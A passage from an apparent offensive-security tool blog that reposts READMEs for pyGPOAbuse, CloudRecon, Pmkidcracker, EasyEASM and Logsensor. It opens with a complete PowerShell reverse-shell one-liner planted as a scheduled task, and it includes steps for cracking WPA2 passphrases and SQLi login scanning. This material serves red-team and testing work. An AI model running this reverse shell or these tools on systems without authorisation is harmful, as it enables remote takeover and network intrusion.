System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ <br /> -taskname "Completely Legit Task" \<br /> -description "Dis is legit, pliz no delete" \ <br /> -user</code></pre></div> <h2 dir="auto" tabindex="-1">Credits</h2> <ul dir="auto"> <li><a href="https://twitter.com/pkb1s" rel="nofollow" target="_blank" title="@pkb1s">@pkb1s</a> for <a href="https://github.com/FSecureLABS/SharpGPOAbuse" rel="nofollow" target="_blank" title="SharpGPOAbuse">SharpGPOAbuse</a></li> <li><a href="https://twitter.com/airman604" rel="nofollow" target="_blank" title="@airman604">@airman604</a> for <a href="https://github.com/airman604/schtask_now" rel="nofollow" target="_blank" title="schtask_now.py">schtask_now.py</a></li> <li><a href="https://twitter.com/skelsec" rel="nofollow" target="_blank" title="@SkelSec">@SkelSec</a> for <a href="https://github.com/skelsec/msldap" rel="nofollow" target="_blank" title="msldap">msldap</a></li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Hackndo/pyGPOAbuse" rel="nofollow" target="_blank" title="Download pyGPOAbuse">Download pyGPOAbuse</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-39398472397354876822024-02-18T15:43:00.000-08:002024-02-18T15:43:47.798-08:00CloudRecon - Finding assets from certificates<article><div class="post-body entry-content" id="post-body-879478449228198068" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKuGMJK0d70mOcmfPRucqUtXe2lmcfR4o-6YeoUQJAFW97-q_FAwoir8Cf_A7gHKxQiUAPq78W94FCtk_QynyNNQbUTTduclLlPnWbi-tTVBs9Hz4M41eH08v6JGW8jKMgocFcbpuqxjCdxIv1vUPKBllGnB0lvb21sE3Yd2nZFnTwhduG0LrwQymamb-X/s1792/CloudRecon.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKuGMJK0d70mOcmfPRucqUtXe2lmcfR4o-6YeoUQJAFW97-q_FAwoir8Cf_A7gHKxQiUAPq78W94FCtk_QynyNNQbUTTduclLlPnWbi-tTVBs9Hz4M41eH08v6JGW8jKMgocFcbpuqxjCdxIv1vUPKBllGnB0lvb21sE3Yd2nZFnTwhduG0LrwQymamb-X/w640-h366/CloudRecon.png" width="640" /></a></div><p><br /></p><h1 dir="auto" tabindex="-1">CloudRecon</h1> <p dir="auto">Finding assets from certificates! Scan the web! Tool presented @DEFCON 31</p> <h1 dir="auto" tabindex="-1">Install</h1> <p dir="auto">** You must have CGO enabled, and may have to install gcc to run CloudRecon**</p> <div><pre><code>sudo apt install gcc</code></pre></div> <div><pre><code>go install github.com/g0ldencybersec/CloudRecon@latest</code></pre></div> <h1 dir="auto" tabindex="-1">Description</h1> <p dir="auto"><strong>CloudRecon</strong></p> <p dir="auto">CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.</p> <p dir="auto">Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.</p> <p dir="auto">CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.</p> <p dir="auto">The tool suite is three parts in GO:</p> <p dir="auto">Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.</p> <p dir="auto">Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.</p> <p dir="auto">Retr - a tool to parse and search through the downloaded certs for keywords.</p> <h1 dir="auto" tabindex="-1">Usage</h1> <p dir="auto"><strong>MAIN</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Usage: CloudRecon scrape|store|retr [options] -h Show the program usage message Subcommands: cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file cloudrecon retr - Query local DB file for results" dir="auto"><pre><code>Usage: CloudRecon scrape|store|retr [options]<br /><br /> -h Show the program usage message<br /><br />Subcommands: <br /><br /> cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout<br /> cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file<br /> cloudrecon retr - Query local DB file for results</code></pre></div> <p dir="auto"><strong>SCRAPE</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="scrape [options] -i <IPs/CIDRs or File> -a Add this flag if you want to see all output including failures -c int How many goroutines running concurrently (default 100) -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" ) -p string TLS ports to check for <a title="Certificates" href="https://www.fuck.com/search/label/Certificates">certificates</a> (default "443") -t int Timeout for TLS <a title="Handshake" href="https://www.fuck.com/search/label/Handshake">handshake</a> (default 4)" dir="auto"><pre><code>scrape [options] -i <IPs/CIDRs or File><br /> -a Add this flag if you want to see all output including failures<br /> -c int<br /> How many goroutines running concurrently (default 100)<br /> -h print usage!<br /> -i string<br /> Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )<br /> -p string<br /> TLS ports to check for certificates (default "443")<br /> -t int<br /> Timeout for TLS handshake (default 4)</code></pre></div> <p dir="auto"><strong>STORE</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="store [options] -i <IPs/CIDRs or File> -c int How many goroutines running concurrently (default 100) -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -i string Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE") -p string TLS ports to check for certificates (default "443") -t int Timeout for TLS handshake (default 4)" dir="auto"><pre><code>store [options] -i <IPs/CIDRs or File><br /> -c int<br /> How many goroutines running concurrently (default 100)<br /> -db string<br /> String of the DB you want to connect to and save certs! (default "certificates.db")<br /> -h print usage!<br /> -i string<br /> Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")<br /> -p string<br /> TLS ports to check for certificates (default "443")<br /> -t int<br /> Timeout for TLS handshake (default 4)</code></pre></div> <p dir="auto"><strong>RETR</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="retr [options] -all Return all the rows in the DB -cn string String to search for in common name column, returns like-results (default "NONE") -db string String of the DB you want to connect to and save certs! (default "certificates.db") -h print usage! -ip string String to search for in IP column, returns like-results (default "NONE") -num Return the Number of rows (results) in the DB (By IP) -org string String to search for in Organization column, returns like-results (default "NONE") -san string String to search for in common name column, returns like-results (default "NONE")" dir="auto"><pre><code>retr [options]<br /> -all<br /> Return all the rows in the DB<br /> -cn string<br /> String to search for in common name column, returns like-results (default "NONE")<br /> -db string<br /> String of the DB you want to connect to and save certs! (default "certificates.db")<br /> -h print usage!<br /> -ip string<br /> String to search for in IP column, returns like-results (default "NONE")<br /> -num<br /> Return the Number of rows (results) in the DB (By IP)<br /> -org string<br /> String to search for in Organization column, returns like-results (default "NONE")<br /> -san string<br /> String to search for in common name column, returns like-results (default "NONE")</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/g0ldencybersec/CloudRecon" rel="nofollow" target="_blank" title="Download CloudRecon">Download CloudRecon</a></span></b></div>
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-50071618698303616572024-02-18T15:41:00.000-08:002024-02-18T15:41:27.244-08:00Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication<article><div class="post-body entry-content" id="post-body-1098708597056961998" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhw1b6pfD0Y_aPyFbES7LKYrGQOKTv_Ynhzo9d898_MKuZlOUR_x3t_ixVJ6osromyM_2aZu_Sy1GQjDekPeQLFdRhoLFLytETV6Fw1hY6xOLb-3PwEkSZBbjPtHaeNDNrvyot4RCN9aaP7W7Is4cWy-hAfjXRqfQPbCQI26in2UEpQoof5Sk4OWn44yM6D"><img alt="" border="0" height="462" id="BLOGGER_PHOTO_ID_7310068326057100370" src="https://blogger.googleusercontent.com/img/a/AVvXsEhw1b6pfD0Y_aPyFbES7LKYrGQOKTv_Ynhzo9d898_MKuZlOUR_x3t_ixVJ6osromyM_2aZu_Sy1GQjDekPeQLFdRhoLFLytETV6Fw1hY6xOLb-3PwEkSZBbjPtHaeNDNrvyot4RCN9aaP7W7Is4cWy-hAfjXRqfQPbCQI26in2UEpQoof5Sk4OWn44yM6D=w640-h462" width="640" /></a></p><div><br /></div> <p dir="auto">This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.</p> <h2 dir="auto" tabindex="-1">Program Usage</h2> <div><pre><code>python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)><br /></code></pre></div> <a href="https://private-user-images.githubusercontent.com/28621928/244882215-2ebf5b8b-fccb-4465-86a4-1bb117117018.JPG?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTEiLCJleHAiOjE3MDIwMDc3MDYsIm5iZiI6MTcwMjAwNzQwNiwicGF0aCI6Ii8yODYyMTkyOC8yNDQ4ODIyMTUtMmViZjViOGItZmNjYi00NDY1LTg2YTQtMWJiMTE3MTE3MDE4LkpQRz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFJV05KWUFYNENTVkVINTNBJTJGMjAyMzEyMDglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjMxMjA4VDAzNTAwNlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTgyOTY3YzQ4YjJiNmVmNzQ0ZDAyODY3YjdlNzU4OThkOWVhOWY1NTJmNzc5YzM0Yzc3MDg0M2QwYTU0YTZiNjMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.taYiut9SRP0iJFccGvwh7EEYORvznOatsLYm-mmq9yM" rel="nofollow" target="_blank" title="A tool to crack WPA2 passphrase with PMKID value without clients or de-authentication (1)"></a><p dir="auto"><strong>NOTE:</strong> <em>apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9</em></p> <h2 dir="auto" tabindex="-1">How PMKID is Calculated</h2> <p dir="auto">The two main formulas to obtain a PMKID are as follows:</p> <ol dir="auto"> <li><strong>Pairwise Master Key (PMK) Calculation:</strong> passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations</li> <li><strong>PMKID Calculation:</strong> HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]</li> </ol> <p dir="auto">This is just for understanding, both are already implemented in <code>find_pw_chunk</code> and <code>calculate_pmkid</code>.</p> <h2 dir="auto" tabindex="-1">Obtaining the PMKID</h2> <p dir="auto">Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.</p> <p dir="auto"><em>*<strong>You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.</strong></em></p> <p dir="auto">To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP <strong>using an invalid password</strong> to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.</p> <p dir="auto"><strong>Open the pcap in WireShark:</strong></p> <ul dir="auto"> <li>Filter with <code>wlan_rsna_eapol.keydes.msgnr == 1</code> in WireShark to display only EAPOL message 1 packets.</li> <li>In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC</li> <li>In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below</li> </ul> <p dir="auto"><strong>If access point is vulnerable, you should see the PMKID value like the below screenshot:</strong></p> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/28621928/232556774-2ecf784c-4d13-4cd6-9f15-ae8ff095823e.png" rel="nofollow" target="_blank" title="A tool to crack WPA2 passphrase with PMKID value without clients or de-authentication (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgnhIy35QKaNmbDTGNg0V4L5m7Ip3J2R87ysRe5-Ppr38CmGV2z9M8xRiAiTM7wLGa_sicIIjPASf8hUs1CHX6EVxwqI7ur1KqfemvQ3oqdQAvqCY_YCIV1DpX-TgsgOSlNa3lBpjPjJfrLZS4vZGe8ZOADGJnSLHq-UIF-5kHAZUIh7NMEbDToW6lY-2wS"><img alt="" border="0" height="386" id="BLOGGER_PHOTO_ID_7310068347436761858" src="https://blogger.googleusercontent.com/img/a/AVvXsEgnhIy35QKaNmbDTGNg0V4L5m7Ip3J2R87ysRe5-Ppr38CmGV2z9M8xRiAiTM7wLGa_sicIIjPASf8hUs1CHX6EVxwqI7ur1KqfemvQ3oqdQAvqCY_YCIV1DpX-TgsgOSlNa3lBpjPjJfrLZS4vZGe8ZOADGJnSLHq-UIF-5kHAZUIh7NMEbDToW6lY-2wS=w640-h386" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Demo Run</h2> <p dir="auto" style="text-align: center;"><a href="https://user-images.githubusercontent.com/28621928/232557213-5f5746e7-6cdb-4346-a0c7-31e66c34a7d1.png" rel="nofollow" target="_blank" title="A tool to crack WPA2 passphrase with PMKID value without clients or de-authentication (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh4imPJseOE_CbEZat81jEK-yGdxBs0gQmyZ91ZjvUYH5FXEL_Ck7bdTaoPwvtyfe8iD4iODbFaelY5zl7HYQ4-eA9P63OHavFreKIrKaMy6REOAQN7l6INDckFe1M78Xdwqv1-tMwJ9S1QmytlL4qizh1jmIjDzetWpsntg98--R_01Vihkg_TJ1j6d2k5"><img alt="" border="0" height="238" id="BLOGGER_PHOTO_ID_7310068364822647714" src="https://blogger.googleusercontent.com/img/a/AVvXsEh4imPJseOE_CbEZat81jEK-yGdxBs0gQmyZ91ZjvUYH5FXEL_Ck7bdTaoPwvtyfe8iD4iODbFaelY5zl7HYQ4-eA9P63OHavFreKIrKaMy6REOAQN7l6INDckFe1M78Xdwqv1-tMwJ9S1QmytlL4qizh1jmIjDzetWpsntg98--R_01Vihkg_TJ1j6d2k5=w640-h238" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Disclaimer</h2> <p dir="auto">This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/n0mi1k/pmkidcracker" rel="nofollow" target="_blank" title="Download Pmkidcracker">Download Pmkidcracker</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-9317195825850379252024-02-18T15:30:00.000-08:002024-02-18T15:30:55.246-08:00EasyEASM - Zero-dollar Attack Surface Management Tool<article><div class="post-body entry-content" id="post-body-1574150313303608512" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiF0nbft8lV2IOQZsung9oQBKV132O2Os_dmSdH9V6k_eGUmAbv0HVDH6UctPeck97BFHLwCVD9cN09FbCdB5HUkpa_xmNNru2FhDGfG5j-jRqiwMVzthNERFowu0YPXs-4BylVTcq5HycF6cUsCltxQ68WNtA4iaN0XM16_zeKvhWMMs8GRJgI8Cgxkrfe"><img alt="" border="0" height="160" id="BLOGGER_PHOTO_ID_7310066350416498722" src="https://blogger.googleusercontent.com/img/a/AVvXsEiF0nbft8lV2IOQZsung9oQBKV132O2Os_dmSdH9V6k_eGUmAbv0HVDH6UctPeck97BFHLwCVD9cN09FbCdB5HUkpa_xmNNru2FhDGfG5j-jRqiwMVzthNERFowu0YPXs-4BylVTcq5HycF6cUsCltxQ68WNtA4iaN0XM16_zeKvhWMMs8GRJgI8Cgxkrfe=w640-h160" width="640" /></a></p><p style="text-align: center;"><br /></p><div> <p dir="auto">Zero-dollar attack surface management tool</p> <p dir="auto">featured at <a href="https://www.blackhat.com/us-23/arsenal/schedule/index.html#easy-easm---the-zero-dollar-attack-surface-management-tool-33645" rel="nofollow" target="_blank" title="Black Hat">Black Hat </a><a href="https://www.fuck.com/search/label/Arsenal" target="_blank" title="Arsenal">Arsenal</a> 2023 and <a href="https://reconvillage.org/recon-village-talks-2023-defcon-31/" rel="nofollow" target="_blank" title="Recon Village @ DEF CON 2023">Recon Village @ DEF CON 2023</a>.</p> </div> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.</p> <p dir="auto">The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.</p> <p dir="auto">With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <div><pre><code>go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest</code></pre></div> <h2 dir="auto" tabindex="-1">Example config file</h2> <p dir="auto">The tool expects a configuration file named <code>config.yml</code> to be in the directory you are running from.</p> <p dir="auto">Here is example of this yaml file:</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# EasyEASM configurations runConfig: domains: # List root domains here. - example.com - mydomain.com slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications. discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications. runType: fast # Set to either fast (passive enum) or complete (active enumeration). activeWordList: subdomainWordlist.txt activeThreads: 100" dir="auto"><pre><code># EasyEASM configurations<br />runConfig:<br /> domains: # List root domains here.<br /> - example.com<br /> - mydomain.com<br /> slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.<br /> discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.<br /> runType: fast # Set to either fast (passive enum) or complete (active enumeration).<br /> activeWordList: subdomainWordlist.txt<br /> activeThreads: 100</code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">To run the tool, fill out the config file: <code>config.yml</code>. Then, run the <code>easyeasm</code> module:</p> <div><pre><code>./easyeasm</code></pre></div> <p dir="auto">After the run is complete, you should see the output CSV (<code>EasyEASM.csv</code>) in the run directory. This CSV can be added to your asset database and risk register!</p> <h2 dir="auto" tabindex="-1">Warranty</h2> <p dir="auto">The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.</p> <p dir="auto">The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.</p> <p dir="auto">The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.</p> <p dir="auto">Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.</p> <p dir="auto">By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.</p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">This project is licensed under the MIT License - see the <a href="https://github.com/g0ldencybersec/EasyEASM/blob/main/LICENSE.md" rel="nofollow" target="_blank" title="LICENSE.md">LICENSE.md</a> for details.</p> <h2 dir="auto" tabindex="-1">Contact</h2> <p dir="auto">For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.</p> <ul dir="auto"> <li><a href="https://twitter.com/G0LDEN_infosec" rel="nofollow" target="_blank" title="Gunnar Andrews">Gunnar Andrews</a></li> <li><a href="https://oliviagallucci.com" rel="nofollow" target="_blank" title="Olivia Gallucci">Olivia Gallucci</a></li> <li><a href="https://twitter.com/Jhaddix" rel="nofollow" target="_blank" title="Jason Haddix">Jason Haddix</a></li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/g0ldencybersec/EasyEASM" rel="nofollow" target="_blank" title="Download EasyEASM">Download EasyEASM</a></span></b></div>
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-53074903581765807002024-02-18T15:27:00.000-08:002024-02-18T15:27:28.707-08:00Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning<article><div class="post-body entry-content" id="post-body-8889962215465828755" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC"><img alt="" border="0" height="532" id="BLOGGER_PHOTO_ID_7310066164700791922" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC=w640-h532" width="640" /></a></p><p><br /></p> <p dir="auto">A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning</p> <p dir="auto"><strong>Features</strong></p> <ul dir="auto"> <li>login panel Scanning for multiple hosts</li> <li>Proxy compatibility (http, https)</li> <li>Login panel scanning are done in multiprocessing</li> </ul> <blockquote> <p dir="auto">so the script is super fast at scanning many urls</p> </blockquote> <blockquote> <p dir="auto">quick tutorial & screenshots are shown at the bottom<br /> project contribution tips at the bottom</p></blockquote> <p dir="auto"><strong>Installation</strong></p> <div><pre><code>git clone https://github.com/Mr-Robert0/Logsensor.git<br />cd Logsensor && sudo chmod +x logsensor.py install.sh<br />pip install -r requirements.txt<br />./install.sh<br /><br /></code></pre></div> <blockquote> <p dir="auto">Dependencies</p> <ul dir="auto"> <li><a href="https://pypi.org/project/regex/" rel="nofollow" target="_blank" title="re">re</a></li> <li><a href="https://pypi.python.org/pypi/bs4" rel="nofollow" target="_blank" title="bs4">bs4</a></li> <li><a href="https://pypi.python.org/pypi/termcolor" rel="nofollow" target="_blank" title="termcolor">termcolor</a></li> <li><a href="https://pypi.python.org/pypi/argparse" rel="nofollow" target="_blank" title="argparse">argparse</a></li> <li><a href="https://pypi.python.org/pypi/tabulate/" rel="nofollow" target="_blank" title="tabulate">tabulate</a></li> <li><a href="https://pypi.python.org/pypi/requests/" rel="nofollow" target="_blank" title="requests">requests</a></li></ul></blockquote> <h3 dir="auto" tabindex="-1">Quick Tutorial</h3> <p dir="auto"><strong>1. Multiple hosts scanning to detect login panels</strong></p> <ul dir="auto"> <li>You can increase the threads (default 30)</li> <li>only run login detector module</li> </ul> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python3 logsensor.py -f <subdomains-list> python3 logsensor.py -f <subdomains-list> -t 50 python3 logsensor.py -f <subdomains-list> --login" dir="auto"><pre><code>python3 logsensor.py -f <subdomains-list> <br />python3 logsensor.py -f <subdomains-list> -t 50<br />python3 logsensor.py -f <subdomains-list> --login</code></pre></div> <p dir="auto"><strong>2. Targeted SQLi form scanning</strong></p> <ul dir="auto"> <li>can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module</li> <li>turn on the proxy to see the requests</li> <li>customize user input name of login panel with actual name (default "username")</li> </ul> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python logsensor.py -u www.example.com/login --sqli python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080 python logsensor.py -u www.example.com/login -s --inputname email" dir="auto"><pre><code>python logsensor.py -u www.example.com/login --sqli <br />python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080<br />python logsensor.py -u www.example.com/login -s --inputname email</code></pre></div> <p dir="auto"><strong>View help</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python logsensor.py --help usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads] optional arguments: -u , --url Target URL (e.g. http://example.com/ ) -f , --file Select a target hosts list file (e.g. list.txt ) --proxy Proxy (e.g. http://127.0.0.1:8080) -l, --login run only <a title=" href="https://www.kitploit.com/search/label/Login" login="">Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto"><pre><code>python logsensor.py --help<br /><br />usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]<br /><br />optional arguments:<br /> -u , --url Target URL (e.g. http://example.com/ )<br /> -f , --file Select a target hosts list file (e.g. list.txt )<br /> --proxy Proxy (e.g. http://127.0.0.1:8080)<br /> -l, --login run only Login panel Detector Module<br /> -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls <br /> -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')<br /> -t , --threads Number of threads (default 30)<br /> -h, --help Show this help message and exit</code></pre></div> <h3 dir="auto" tabindex="-1">Screenshots</h3> <p dir="auto" style="text-align: center;"><a href="https://raw.githubusercontent.com/Mr-Robert0/Logsensor/main/Screenshots/1.png" rel="nofollow" target="_blank" title="A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning (11)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC"><img alt="" border="0" height="532" id="BLOGGER_PHOTO_ID_7310066164700791922" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC=w640-h532" width="640" /></a> <a href="https://raw.githubusercontent.com/Mr-Robert0/Logsensor/main/Screenshots/2.png" rel="nofollow" target="_blank" title="A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning (12)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhhaFlcrTyOBXpb-mMPlh4dlTKuB5YnVC8XVlZy7Kw9GurkV5TmOX90EBiZh_DzV5OTeEHzDaLrF0P6WKuiM5z5iYGO6_5taQmqNxMvYAZNI1KG9Zl9dNzken41kUOJ8H7USqtTcUznTMFz84b6IS3oxKUI6OeKpMB5jP0lM0WX0GLTZotc4NbgSs0ls6HS"><img alt="" border="0" height="372" id="BLOGGER_PHOTO_ID_7310066183572724162" 